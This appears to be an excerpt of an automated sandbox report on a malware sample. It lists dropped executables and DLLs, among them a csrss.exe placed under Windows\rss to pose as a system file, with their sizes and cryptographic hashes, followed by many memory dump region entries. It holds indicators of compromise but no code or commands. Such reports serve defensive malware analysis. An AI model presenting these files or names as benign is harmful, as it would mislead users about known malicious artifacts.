SHA1
98c101576e861a5e2fc7ff992306a26d37e1d283

SHA256
2910d7b207a0e1931a204743859a27085895495382757932b9b363deb2c250cb

SHA512
c55f97aedd9053faea5490cdae100b54102840cb26f33f2a314d3b7ca131a4a06b40e93bf1bf3ebff493e980354a4359713a4e9ea46ac6593eb4dfccd9337b5a

Download Submit
\Users\Admin\AppData\Local\Temp\rty25.exe

Filesize
715KB

MD5
8dc1f88ae1fcedeb3983c5f5c3d486b0

SHA1
d40e67ba5558d90cb11eeca04d213322159336fc

SHA256
4a15d91920a4da9a64935248c126fb60e8302198df8e5759da8129ac1841beca

SHA512
0b2263fe049e280af1178fd396a06a04e6b99f7c971839207ae225161257ed9d9b7eaa8d0ceb1f14d3aa2094b53ce91dd045ebc169102e707ea7285f91432ac1

Download Submit
\Users\Admin\AppData\Local\Temp\symsrv.dll

Filesize
163KB

MD5
5c399d34d8dc01741269ff1f1aca7554

SHA1
e0ceed500d3cef5558f3f55d33ba9c3a709e8f55

SHA256
e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f

SHA512
8ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d

Download Submit
\Users\Admin\AppData\Local\Temp\toolspub1.exe

Filesize
238KB

MD5
8c20d9745afb54a1b59131314c15d61c

SHA1
1975f997e2db1e487c1caf570263a6a3ba135958

SHA256
a613b6598e0d4c2e52e6ff91538aca8d92c66ef7c13a9baadcba0039570a69d1

SHA512
580021850dfc90647854dd9f8124418abffbe261e3d7f2e1d355dd3a40f31be24f1b9df77ad52f7fa63503a5ee857e270c156e5575e3a32387335018296128d7

Download Submit
\Users\Admin\AppData\Local\Temp\u21k.1.exe

Filesize
768KB

MD5
34a403db32d017fee6ea97628a6b374f

SHA1
668db29d2dbd188e534c8e75b86a732282c243ac

SHA256
c79e9a1f44e5b3fe9e0bed81f73acc4885a9e98ea4396890c81e83aebf300991

SHA512
d2fce151df8eb6e450383d6172204e925d04dcece45515ebe1a7f8843c76842abcf5834fa7ffca0e85d39d0b28934726eb9b19ec834a7a4c656fba73db1c5c1b

Download Submit
\Windows\rss\csrss.exe

Filesize
1.1MB

MD5
a3fbf5f11e617076ce1f7e9b5a06476d

SHA1
20070e3070bce3e1c278b8676bd5818e28861f21

SHA256
804a9f80fcf366341952b43574b1064e5eaf7d0176bf75c8347c485733518d6b

SHA512
cc09271c6d93f3600978f19174cc341a781813d5a953fa74e0946fe8a7b6dbcd220be6c09ed7d78008bbd855167ceb6616edec854c557b96f100eddeb3624fb2

Download Submit
\Windows\rss\csrss.exe

Filesize
585KB

MD5
59d0b7944df5d189460527c9d16fe33c

SHA1
ddb4a7e7296b756d3ea420c3cb5059d313e85627

SHA256
3b95ff66e51dbe9c9293827018e5509117689b2a950e747459a85054a5aac8a0

SHA512
d7282cc19c2ae78428ce5c55f7bc3c2d7d8029e2d5bc73bc59b328008a885260737ea6484de9daf131bacbeb081a002b42aaca68c314c37ea94d8030c2bee4bd

Download Submit
memory/308-318-0x0000000140000000-0x00000001405E8000-memory.dmp

Filesize
5.9MB

Download
memory/308-288-0x0000000140000000-0x00000001405E8000-memory.dmp

Filesize
5.9MB

Download
memory/320-691-0x0000000000400000-0x0000000000406000-memory.dmp

Filesize
24KB

Download
memory/548-186-0x0000000061E00000-0x0000000061EF3000-memory.dmp

Filesize
972KB

Download
memory/548-331-0x00000000007E0000-0x00000000008E0000-memory.dmp

Filesize
1024KB

Download
memory/548-330-0x0000000000400000-0x0000000000647000-memory.dmp

Filesize
2.3MB

Download
memory/548-100-0x00000000007E0000-0x00000000008E0000-memory.dmp

Filesize
1024KB

Download
memory/548-101-0x0000000000260000-0x0000000000294000-memory.dmp

Filesize
208KB

Download
memory/548-102-0x0000000000400000-0x0000000000647000-memory.dmp

Filesize
2.3MB

Download
memory/548-244-0x0000000000400000-0x0000000000647000-memory.dmp

Filesize
2.3MB

Download
memory/576-579-0x0000000000400000-0x00000000008DF000-memory.dmp

Filesize
4.9MB

Download
memory/576-576-0x0000000000400000-0x00000000008DF000-memory.dmp

Filesize
4.9MB

Download
memory/588-836-0x0000000000050000-0x000000000091D000-memory.dmp

Filesize
8.8MB

Download
memory/880-522-0x0000000001E50000-0x0000000001F6B000-memory.dmp

Filesize
1.1MB

Download
memory/880-398-0x00000000004D0000-0x0000000000562000-memory.dmp

Filesize
584KB

Download
memory/880-403-0x00000000004D0000-0x0000000000562000-memory.dmp

Filesize
584KB

Download
memory/880-405-0x0000000001E50000-0x0000000001F6B000-memory.dmp

Filesize
1.1MB

Download
memory/912-410-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/912-433-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/912-409-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/912-404-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/912-401-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/1060-701-0x0000000000530000-0x0000000000630000-memory.dmp

Filesize
1024KB

Download
memory/1060-702-0x0000000000400000-0x000000000044A000-memory.dmp

Filesize
296KB

Download
memory/1060-716-0x0000000000400000-0x000000000044A000-memory.dmp

Filesize
296KB

Download
memory/1200-388-0x0000000003E90000-0x0000000003EA6000-memory.dmp

Filesize
88KB

Download
memory/1200-182-0x0000000002B40000-0x0000000002B56000-memory.dmp

Filesize
88KB

Download
memory/1632-577-0x0000000000400000-0x00000000008DF000-memory.dmp

Filesize
4.9MB

Download
memory/1632-626-0x0000000000400000-0x00000000008DF000-memory.dmp

Filesize
4.9MB

Download
memory/1720-676-0x0000000000950000-0x0000000000A50000-memory.dmp

Filesize
1024KB

Download
memory/1720-674-0x0000000000220000-0x0000000000224000-memory.dmp

Filesize
16KB

Download
memory/1740-516-0x00000000002E0000-0x00000000003E0000-memory.dmp

Filesize
1024KB

Download
memory/1740-517-0x00000000001C0000-0x00000000001F1000-memory.dmp

Filesize
196KB

Download
memory/2008-1-0x0000000000AB0000-0x0000000001040000-memory.dmp

Filesize
5.6MB

Download
memory/2008-38-0x00000000747C0000-0x0000000074EAE000-memory.dmp

Filesize
6.9MB

Download
memory/2008-0-0x00000000747C0000-0x0000000074EAE000-memory.dmp

Filesize
6.9MB

Download
memory/2088-501-0x0000000000400000-0x0000000000D1C000-memory.dmp

Filesize
9.1MB

Download
memory/2088-408-0x0000000000400000-0x0000000000D1C000-memory.dmp

Filesize
9.1MB

Download
memory/2088-843-0x000000002D540000-0x000000002DA28000-memory.dmp

Filesize
4.9MB

Download
memory/2088-837-0x000000002D440000-0x000000002DD0D000-memory.dmp

Filesize
8.8MB

Download
memory/2088-245-0x0000000002550000-0x0000000002948000-memory.dmp

Filesize
4.0MB

Download
memory/2088-438-0x0000000000400000-0x0000000000D1C000-memory.dmp

Filesize
9.1MB

Download
memory/2088-835-0x000000002D440000-0x000000002DD0D000-memory.dmp

Filesize
8.8MB

Download
memory/2088-828-0x000000002D440000-0x000000002D921000-memory.dmp

Filesize
4.9MB

Download
memory/2088-827-0x000000002D440000-0x000000002D921000-memory.dmp

Filesize
4.9MB

Download
memory/2088-246-0x0000000000400000-0x0000000000D1C000-memory.dmp

Filesize
9.1MB

Download
memory/2088-235-0x0000000002550000-0x0000000002948000-memory.dmp

Filesize
4.0MB

Download
memory/2088-373-0x0000000000400000-0x0000000000D1C000-memory.dmp

Filesize
9.1MB

Download
memory/2124-523-0x0000000000400000-0x0000000000644000-memory.dmp

Filesize
2.3MB

Download
memory/2124-586-0x0000000000400000-0x0000000000644000-memory.dmp

Filesize
2.3MB

Download
memory/2244-26-0x00000000FF350000-0x00000000FF407000-memory.dmp

Filesize
732KB

Download
memory/2244-213-0x00000000022F0000-0x00000000023FA000-memory.dmp

Filesize
1.0MB

Download
memory/2244-214-0x0000000003560000-0x000000000368C000-memory.dmp

Filesize
1.2MB

Download
memory/2244-240-0x0000000003560000-0x000000000368C000-memory.dmp

Filesize
1.2MB

Download
memory/2328-754-0x0000000000930000-0x0000000000A30000-memory.dmp

Filesize
1024KB

Download
memory/2340-191-0x0000000002670000-0x0000000002A68000-memory.dmp

Filesize
4.0MB

Download
memory/2340-198-0x0000000000400000-0x0000000000D1C000-memory.dmp

Filesize
9.1MB

Download
memory/2340-163-0x0000000002670000-0x0000000002A68000-memory.dmp

Filesize
4.0MB

Download
memory/2340-236-0x0000000000400000-0x0000000000D1C000-memory.dmp

Filesize
9.1MB

Download
memory/2368-435-0x0000000000220000-0x00000000002B2000-memory.dmp

Filesize
584KB

Download
memory/2368-447-0x0000000000220000-0x00000000002B2000-memory.dmp

Filesize
584KB

Download
memory/2432-829-0x0000000000400000-0x00000000008E1000-memory.dmp

Filesize
4.9MB

Download
memory/2504-635-0x00000000002A0000-0x0000000000DFB000-memory.dmp

Filesize
11.4MB

Download
memory/2504-625-0x0000000000160000-0x0000000000161000-memory.dmp

Filesize
4KB

Download
memory/2504-593-0x00000000002A0000-0x0000000000DFB000-memory.dmp

Filesize
11.4MB

Download
memory/2504-589-0x00000000002A0000-0x0000000000DFB000-memory.dmp

Filesize
11.4MB

Download
memory/2564-381-0x0000000000550000-0x0000000000650000-memory.dmp

Filesize
1024KB

Download
memory/2564-389-0x0000000000400000-0x000000000044B000-memory.dmp

Filesize
300KB

Download
memory/2564-382-0x0000000000400000-0x000000000044B000-memory.dmp

Filesize
300KB

Download
memory/2584-799-0x0000000000940000-0x0000000000A40000-memory.dmp

Filesize
1024KB

Download
memory/2648-30-0x0000000000570000-0x0000000000670000-memory.dmp

Filesize
1024KB

Download
memory/2648-40-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/2648-181-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/2648-36-0x0000000000240000-0x00000000002A7000-memory.dmp

Filesize
412KB

Download
memory/2716-42-0x0000000000220000-0x000000000022B000-memory.dmp

Filesize
44KB

Download
memory/2716-44-0x00000000004E0000-0x00000000005E0000-memory.dmp

Filesize
1024KB

Download
memory/2716-43-0x0000000000400000-0x000000000044A000-memory.dmp

Filesize
296KB

Download
memory/2716-183-0x0000000000400000-0x000000000044A000-memory.dmp

Filesize
296KB

Download
memory/2804-492-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/2804-493-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/2804-490-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/2804-502-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/2804-477-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/2804-448-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/2804-450-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/2804-476-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/2820-39-0x0000000002B00000-0x00000000033EB000-memory.dmp

Filesize
8.9MB

Download
memory/2820-27-0x0000000002700000-0x0000000002AF8000-memory.dmp

Filesize
4.0MB

Download
memory/2820-167-0x0000000000400000-0x0000000000D1C000-memory.dmp

Filesize
9.1MB

Download
memory/2820-18-0x0000000002700000-0x0000000002AF8000-memory.dmp

Filesize
4.0MB

Download
memory/2820-41-0x0000000000400000-0x0000000000D1C000-memory.dmp

Filesize
9.1MB

Download
memory/2860-706-0x0000000000920000-0x0000000000A20000-memory.dmp

Filesize
1024KB

Download
memory/3068-383-0x0000000000400000-0x00000000008E2000-memory.dmp

Filesize
4.9MB

Download
memory/3068-276-0x0000000000400000-0x00000000008E2000-memory.dmp

Filesize
4.9MB

Download
memory/3068-195-0x00000000003C0000-0x00000000003C1000-memory.dmp

Filesize
4KB

Download
memory/3068-384-0x00000000003C0000-0x00000000003C1000-memory.dmp

Filesize
4KB

Download